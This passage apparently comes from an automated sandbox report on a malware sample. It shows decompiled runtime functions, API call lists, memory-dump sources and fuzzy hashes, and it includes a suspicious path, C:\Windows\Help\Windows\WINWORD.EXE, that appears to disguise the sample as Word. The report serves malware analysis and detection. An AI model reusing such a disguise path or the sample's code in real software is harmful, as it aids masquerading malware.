					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6D864095(_v8 ^ _t294);
			}

0x6d86bb2e
0x6d86bb35
0x6d86bb38
0x6d86bb3d
0x6d86bb45
0x6d86bb48
0x6d86bb4c
0x6d86bb4f
0x6d86bb59
0x6d86bb63
0x6d86bb65
0x6d86bb68
0x6d86bb6b
0x6d86bb71
0x6d86bb73
0x6d86bb7a
0x6d86bb87
0x6d86bb88
0x6d86bb8b
0x6d86bb8e
0x6d86bb8f
0x6d86bb90
0x6d86bb93
0x6d86bb98
0x6d86bea4
0x6d86bea4
0x6d86bb9e
0x6d86bb9e
0x6d86bba1
0x6d86bba3
0x6d86bba9
0x6d86bbac
0x6d86bbb3
0x6d86bbba
0x6d86bbc3
0x00000000
0x00000000
0x6d86bbc9
0x6d86bbcf
0x6d86bbd1
0x6d86bbd3
0x6d86bbd6
0x6d86bbdb
0x6d86bbdf
0x00000000
0x00000000
0x00000000
0x6d86bbdf
0x6d86bbe4
0x6d86bbe7
0x6d86bbe9
0x6d86bbee
0x6d86bca0
0x6d86bca1
0x6d86bca4
0x6d86bca6
0x6d86be54
0x6d86be56
0x00000000
0x6d86be58
0x6d86be58
0x6d86be5b
0x6d86be5e
0x6d86be67
0x6d86be6a
0x6d86be6b
0x6d86be6f
0x6d86be72
0x6d86be72
0x00000000
0x6d86be76
0x6d86bcac
0x6d86bcac
0x6d86bcb1
0x6d86bcb4
0x6d86bcba
0x6d86bcc0
0x6d86bcc9
0x6d86bccc
0x6d86bccc
0x6d86bccd
0x6d86bcce
0x6d86bcd1
0x6d86bcd2
0x00000000
0x6d86bcd2
0x6d86bbf4
0x6d86bc03
0x6d86bc04
0x6d86bc07
0x6d86bc09
0x6d86bc0e
0x6d86be1f
0x6d86be21
0x6d86be23
0x6d86be26
0x6d86be2b
0x6d86be34
0x6d86be37
0x6d86be38
0x6d86be3c
0x6d86be3f
0x6d86be42
0x6d86be42
0x6d86be46
0x6d86be46
0x6d86be46
0x6d86be49
0x6d86be49
0x6d86be49
0x6d86be4b
0x6d86be4b
0x6d86be4f
0x6d86bc14
0x6d86bc14
0x6d86bc18
0x6d86bc1a
0x6d86bc1d
0x6d86bc20
0x6d86bc24
0x6d86bc25
0x6d86bc29
0x6d86bc29
0x6d86bc2c
0x6d86bc31
0x6d86bc3d
0x6d86bc42
0x6d86bc45
0x6d86bc45
0x6d86bc4a
0x6d86bc4c
0x6d86bc4f
0x6d86bc51
0x6d86bc54
0x6d86bc57
0x6d86bc5a
0x6d86bc62
0x6d86bc66
0x6d86bc6a
0x6d86bc6a
0x6d86bc70
0x6d86bc76
0x6d86bc79
0x6d86bc81
0x6d86bc88
0x6d86bc8c
0x6d86bc8d
0x6d86bc90
0x6d86bc91
0x6d86bcd5
0x6d86bcd5
0x6d86bcd9
0x6d86bcda
0x6d86bcdf
0x6d86bce5
0x00000000
0x6d86bceb
0x6d86bcef
0x6d86bd78
0x6d86bd7f
0x6d86bd87
0x6d86bd8f
0x6d86bd94
0x6d86bd97
0x6d86bd9c
0x00000000
0x6d86bda2
0x6d86bdb7
0x6d86be9b
0x6d86bea1
0x00000000
0x6d86bdbd
0x6d86bdc6
0x6d86bdc8
0x6d86bdce
0x00000000
0x6d86bdd4
0x6d86bdd8
0x6d86be0e
0x6d86be11
0x00000000
0x6d86be17
0x6d86be17
0x00000000
0x6d86be17
0x6d86bdda
0x6d86bddc
0x6d86bdde
0x6d86bdf7
0x00000000
0x6d86bdfd
0x6d86be01
0x00000000
0x6d86be07
0x6d86be07
0x6d86be0a
0x6d86be0b
0x00000000
0x6d86be0b
0x6d86be01
0x6d86bdf7
0x6d86bdd8
0x6d86bdce
0x6d86bdb7
0x6d86bd9c
0x6d86bce5
0x6d86bc0e
0x00000000
0x6d86bcf6
0x6d86bcf6
0x6d86bcf9
0x6d86bcfd
0x6d86bd00
0x6d86bd22
0x6d86bd25
0x6d86bd2a
0x6d86bd2e
0x6d86bd32
0x6d86bd60
0x6d86bd62
0x00000000
0x6d86bd34
0x6d86bd34
0x6d86bd37
0x6d86bd3a
0x6d86bd3d
0x6d86be78
0x6d86be7b
0x6d86be88
0x6d86be93
0x6d86be98
0x00000000
0x6d86bd43
0x6d86bd4a
0x6d86bd4f
0x6d86bd52
0x6d86bd55
0x00000000
0x6d86bd5b
0x6d86bd5b
0x00000000
0x6d86bd5b
0x6d86bd55
0x6d86bd3d
0x6d86bd02
0x6d86bd09
0x6d86bd0e
0x6d86bd14
0x6d86bd16
0x6d86bd1d
0x6d86bd63
0x6d86bd66
0x6d86bd67
0x6d86bd6c
0x6d86bd6f
0x6d86bd72
0x00000000
0x00000000
0x00000000
0x00000000
0x6d86bd72
0x00000000
0x6d86bd00
0x6d86bba1
0x6d86bea7
0x6d86bea7
0x6d86bea9
0x6d86beac
0x6d86beac
0x6d86beac
0x6d86beac
0x6d86bebe
0x6d86bec0
0x6d86bec1
0x6d86bec2
0x6d86becc

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6D86BB6B
__fassign.LIBCMT ref: 6D86BD4A
__fassign.LIBCMT ref: 6D86BD67
WriteFile.KERNEL32(?,6D86A44E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D86BDAF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D86BDEF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D86BE9B

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 8b09366d61ee848c0bde416abad5ef07ab56445936a9bf335709ad2b8c18e806
Instruction ID: 9b993b5439eb7f88df6c308a0abe4cfc020e5bb4b9f0e1ea8ca4756328d0141c
Opcode Fuzzy Hash: 8b09366d61ee848c0bde416abad5ef07ab56445936a9bf335709ad2b8c18e806
Instruction Fuzzy Hash: BCD1C071D042989FCF11CFA8C9849EDBBB5FF49328F24456AF915BB241D731AA06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303E5B4, Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0303E5FC
__fassign.LIBCMT ref: 0303E7E1
__fassign.LIBCMT ref: 0303E7FE
WriteFile.KERNEL32(?,0303B5DD,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0303E846
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0303E886
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0303E92E

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: fee2b17ddd0021861d407ddf8afcb66cd3d33fb2a1cd45cd1fe99d25d801940e
Instruction ID: 1c10687f461ca18737eb0b3ad050da96534780d02beed0f1eb190d4582e21cb9
Opcode Fuzzy Hash: fee2b17ddd0021861d407ddf8afcb66cd3d33fb2a1cd45cd1fe99d25d801940e
Instruction Fuzzy Hash: B3C18E7AD022589FCF15CFA8C8809EDFBB9EF49314F28426AE855BB241D7319946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03033980, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,030334C3,03032A85,030324AF), ref: 0303398E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0303399C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 030339B5
SetLastError.KERNEL32(00000000,?,030334C3,03032A85,030324AF), ref: 03033A07

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5c638b57e33cef42f0282dd8c6c9d6815e16ca97f5f5c0d9c871df29bbc7fc5c
Instruction ID: eb0923fa3e8e633631aa9947c6c9ebe8f6cf5a181b649672a617039f2226901d
Opcode Fuzzy Hash: 5c638b57e33cef42f0282dd8c6c9d6815e16ca97f5f5c0d9c871df29bbc7fc5c
Instruction Fuzzy Hash: EB014C7F60B711BEE728F5757CC869A2ADCDB4357972003AAE1209A0E0EF154C004184

Uniqueness

Uniqueness Score: -1.00%

Function 6D8662E0, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6D8662E0(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6d877020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6D866717(_t13, __eflags,  *0x6d877020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6D866752(_t14, __eflags,  *0x6d877020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6D867B55();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6D866752(_t18, __eflags,  *0x6d877020, 0);
								} else {
									_t8 = E6D866752(_t18, __eflags,  *0x6d877020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6D8667D7(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6d8662e0
0x6d8662e7
0x6d8662fa
0x6d866301
0x6d866303
0x6d866304
0x6d866307
0x6d866320
0x6d866320
0x6d866309
0x6d866309
0x6d86630b
0x6d866315
0x6d86631c
0x6d86631e
0x6d866325
0x6d86632e
0x6d866331
0x6d866332
0x6d866334
0x6d866348
0x6d866348
0x6d866351
0x6d866336
0x6d86633d
0x6d866343
0x6d866344
0x6d866346
0x6d86635a
0x6d86635c
0x6d86635c
0x00000000
0x00000000
0x00000000
0x6d866346
0x6d86635f
0x00000000
0x00000000
0x00000000
0x6d86631e
0x6d86630b
0x6d866367
0x6d866371
0x6d8662e9
0x6d8662eb
0x6d8662eb

APIs

GetLastError.KERNEL32(00000001,?,6D865F78,6D86437D,6D86463F,?,6D864877,?,00000001,?,?,00000001,?,6D875538,0000000C,6D864970), ref: 6D8662EE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D8662FC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D866315
SetLastError.KERNEL32(00000000,6D864877,?,00000001,?,?,00000001,?,6D875538,0000000C,6D864970,?,00000001,?), ref: 6D866367

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2479f36a4e1aa33d382ffc5b9f2f1bdd0ef5f88f41a57b4f5a5aa159ea083745
Instruction ID: a58860bc66ab8ba8b0e5634170bc30543c58f14aa5bca8d9060a7106b5ebbfd2
Opcode Fuzzy Hash: 2479f36a4e1aa33d382ffc5b9f2f1bdd0ef5f88f41a57b4f5a5aa159ea083745
Instruction Fuzzy Hash: 7901D873A0C7E25EE7110A795D8EB2A2A78FB0BF79B210BB9F224450D0EF114840D1F0

Uniqueness

Uniqueness Score: -1.00%

Function 0303A15A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\Help\Windows\WINWORD.EXE, xrefs: 0303A15F

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\Help\Windows\WINWORD.EXE
API String ID: 0-204361137
Opcode ID: afcbe30a443fd80d3368bc2fac1e358dd509ef7c3ca818aa1c174d1b9ed609f0
Instruction ID: c9306bdc1ebf63389481b996b42a42c7484414c9370bc7e692088d4466db26f7
Opcode Fuzzy Hash: afcbe30a443fd80d3368bc2fac1e358dd509ef7c3ca818aa1c174d1b9ed609f0
Instruction Fuzzy Hash: 8021F6B5706205BFDB60EF798C40EAB77ACEF422647148614F8999B150E731DC2087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D868D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D868D02(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6D869796(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6D869796(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6D866A25(GetLastError());
									_t17 =  *((intOrPtr*)(E6D866A5B(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6D868DC9(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6D866A25(GetLastError());
						_t17 =  *((intOrPtr*)(E6D866A5B(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6D868DC9(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6D868DF0(_a8);
				return 0;
			}

0x6d868d08
0x6d868d0d
0x6d868d21
0x6d868d24
0x6d868d56
0x6d868d5e
0x6d868d60
0x6d868d79
0x6d868d7c
0x6d868d7f
0x6d868d8d
0x6d868d9c
0x6d868da4
0x6d868da6
0x6d868dbf
0x6d868dc2
0x6d868dc2
0x6d868da8
0x6d868daf
0x6d868dba
0x6d868dba
0x6d868dc4
0x6d868dc5
0x00000000
0x6d868dc5
0x6d868d84
0x6d868d89
0x6d868d8b
0x00000000
0x00000000
0x00000000
0x6d868d8b
0x6d868d69
0x6d868d74
0x00000000
0x6d868d74
0x6d868d26
0x6d868d29
0x6d868d2c
0x6d868d3f
0x6d868d42
0x6d868d44
0x6d868d46
0x00000000
0x6d868d46
0x6d868d32
0x6d868d37
0x6d868d39
0x00000000
0x00000000
0x00000000
0x6d868d39
0x6d868d12
0x00000000

Strings

C:\Windows\Help\Windows\WINWORD.EXE, xrefs: 6D868D07

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\Help\Windows\WINWORD.EXE
API String ID: 0-204361137
Opcode ID: 0ac9d8fee5988ecf0dbc5b68f172a8f40798feacfe896d9e56e895c6a8562905
Instruction ID: d1be6c692ed8eef3ad538fe4ba97480a8861e96c3cb1a04a2c58ed80e6fbabd3
Opcode Fuzzy Hash: 0ac9d8fee5988ecf0dbc5b68f172a8f40798feacfe896d9e56e895c6a8562905
Instruction Fuzzy Hash: FE214C7160829AAF97119F698C88E6A77BDEF533B97118F15F618971C0EB31DC0086B0

Uniqueness

Uniqueness Score: -1.00%

Function 03034184, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,03034245,00000000,?,00000001,?,?,030342BC,00000001,FlsFree,03044C84,FlsFree), ref: 03034214

Strings

api-ms-, xrefs: 030341D4

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: d929a6984a1c6f515baf3e7ced3a1408a6a3ac50145a3cb6d31623766aa9f22b
Instruction ID: 939431d07bbcfcfb4eee49df9f5702f80b5baed26a45513ce77c060ebfbb8774
Opcode Fuzzy Hash: d929a6984a1c6f515baf3e7ced3a1408a6a3ac50145a3cb6d31623766aa9f22b
Instruction Fuzzy Hash: 1411E376A03621ABDB32DA6F9C45B5D37DCAF02760F190260E910FF280D774E90486D4

Uniqueness

Uniqueness Score: -1.00%

Function 6D8665BE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D8665BE(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6d8c144c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6d870df0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6D867C88(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6d8665c5
0x6d866639
0x6d8665ca
0x6d8665cc
0x6d8665d3
0x6d8665d7
0x6d8665e0
0x6d8665ef
0x6d8665f8
0x6d8665fc
0x6d866645
0x6d866647
0x6d86664b
0x6d86664e
0x6d86664e
0x6d866654
0x6d866654
0x6d866640
0x6d866644
0x6d866644
0x6d8665fe
0x6d866607
0x6d866631
0x6d866634
0x6d866636
0x6d866636
0x00000000
0x6d866636
0x6d866609
0x6d866614
0x6d866619
0x6d86661e
0x00000000
0x00000000
0x6d866625
0x6d86662b
0x6d86662f
0x00000000
0x00000000
0x00000000
0x6d86662f
0x6d8665dc
0x00000000
0x00000000
0x00000000
0x6d8665de
0x6d86663e
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6D86667F,00000000,?,00000001,00000000,?,6D8666F6,00000001,FlsFree,6D870EAC,FlsFree,00000000), ref: 6D86664E

Strings

api-ms-, xrefs: 6D86660E

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: b981d2259239d65a06176d822e080b03c5413221223203eca27175b7ec1c5c3d
Instruction ID: 5d57a494004c218d93630ef0bc26941b8dd9840f1d796ef3711def93854e2a02
Opcode Fuzzy Hash: b981d2259239d65a06176d822e080b03c5413221223203eca27175b7ec1c5c3d
Instruction Fuzzy Hash: 4311A332A442B6ABDF128B69AC4EB5D37B4AF07774F114991FA10F7280D770E9008AF1

Uniqueness

Uniqueness Score: -1.00%

Function 03035FF9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,03035FAB,?,?,03035F73,?,?,?), ref: 0303600E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 03036021
FreeLibrary.KERNEL32(00000000,?,?,03035FAB,?,?,03035F73,?,?,?), ref: 03036044

Strings

CorExitProcess, xrefs: 03036019
mscoree.dll, xrefs: 03036007

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 03ff6a88ac6314cee6fa3f7462dba58fd506b16ec74a4ac53da0a6c7c9c793ea
Instruction ID: 3b207bf37a0af6fa8497723f93865112f9826773d710fdc48d8abdb09b787254
Opcode Fuzzy Hash: 03ff6a88ac6314cee6fa3f7462dba58fd506b16ec74a4ac53da0a6c7c9c793ea
Instruction Fuzzy Hash: 4EF08275602219FBCB21EBA2DD0BBDEBAB8EB11756F140060B501A1150CBB98B10DA90

Uniqueness

Uniqueness Score: -1.00%

Function 6D866FAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6D866FAA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6d870168(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6d866fb0
0x6d866fb4
0x6d866fbf
0x6d866fc7
0x6d866fd2
0x6d866fd8
0x6d866fdc
0x6d866fe3
0x6d866fe9
0x6d866fe9
0x6d866feb
0x6d866ff0
0x00000000
0x6d866ff5
0x6d866ffc

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D866F5C,?,?,6D866F24,?,00000001,?), ref: 6D866FBF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D866FD2
FreeLibrary.KERNEL32(00000000,?,?,6D866F5C,?,?,6D866F24,?,00000001,?), ref: 6D866FF5

Strings

mscoree.dll, xrefs: 6D866FB8
CorExitProcess, xrefs: 6D866FCA

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 24ab65e7c830cfd4927eadcdd850ee21b620deaea9b51ef3eb1827d220652844
Instruction ID: 18a5909e6c4061313bb2f10993aaa03dceecd958110ecca39c98f4ee4f13f14b
Opcode Fuzzy Hash: 24ab65e7c830cfd4927eadcdd850ee21b620deaea9b51ef3eb1827d220652844
Instruction Fuzzy Hash: A3F01C31904269FBDF119B61CD1EFAE7F79EB06766F1004A0F411A1550CB358A40EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0306425E, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 0306429B
dllmain_crt_dispatch.LIBCMT ref: 030642B2
dllmain_raw.LIBCMT ref: 030642FA
dllmain_crt_dispatch.LIBCMT ref: 0306430D
dllmain_raw.LIBCMT ref: 03064320

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: d7fed6d5e771f389a491f65bafd3df0b51d8120dca44c098603f1968f39e4bca
Instruction ID: 6df51e7dd2293f43eb21f3cb11b3e95ff54a883f1d675d3e33a85ad0e36753bb
Opcode Fuzzy Hash: d7fed6d5e771f389a491f65bafd3df0b51d8120dca44c098603f1968f39e4bca
Instruction Fuzzy Hash: 6B21A172E0322AEBDB61DF57DC40AAF7AB9EFC1A90F594115F8156B218C2318D418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0304D5D3, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 0304D610
dllmain_crt_dispatch.LIBCMT ref: 0304D627
dllmain_raw.LIBCMT ref: 0304D66F
dllmain_crt_dispatch.LIBCMT ref: 0304D682
dllmain_raw.LIBCMT ref: 0304D695

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 0d121a4d39fdeb25e2afcff58211810095a6f5827f427704cdd7849e35a90e90
Instruction ID: 93c486ca524158ae9abccc4e8d2858bc33b74e09daa76de6ba8e70f15396bdb9
Opcode Fuzzy Hash: 0d121a4d39fdeb25e2afcff58211810095a6f5827f427704cdd7849e35a90e90
Instruction Fuzzy Hash: 7E2195F2E03219EBDB61EF55CC449AF7AA9EB81A94F054135FC186B216D7308F418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0306D99D, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0306D9B5
_free.LIBCMT ref: 0306D9C7
_free.LIBCMT ref: 0306D9D9
_free.LIBCMT ref: 0306D9EB
_free.LIBCMT ref: 0306D9FD

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 10af83ba132e3f3a28f618a19dc99005e4d14738c0886383f729278ecb27c0cb
Instruction ID: 5a0581a05db536229bf6738ff8896e12ac442d0b2f2cc37795b483352a17cfac
Opcode Fuzzy Hash: 10af83ba132e3f3a28f618a19dc99005e4d14738c0886383f729278ecb27c0cb
Instruction Fuzzy Hash: 32F0367261B710ABD760DB58E9C5C56B3E9FA447A0758A805F048DB588CB71F8C08664

Uniqueness

Uniqueness Score: -1.00%

Function 03055582, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0305559A
_free.LIBCMT ref: 030555AC
_free.LIBCMT ref: 030555BE
_free.LIBCMT ref: 030555D0
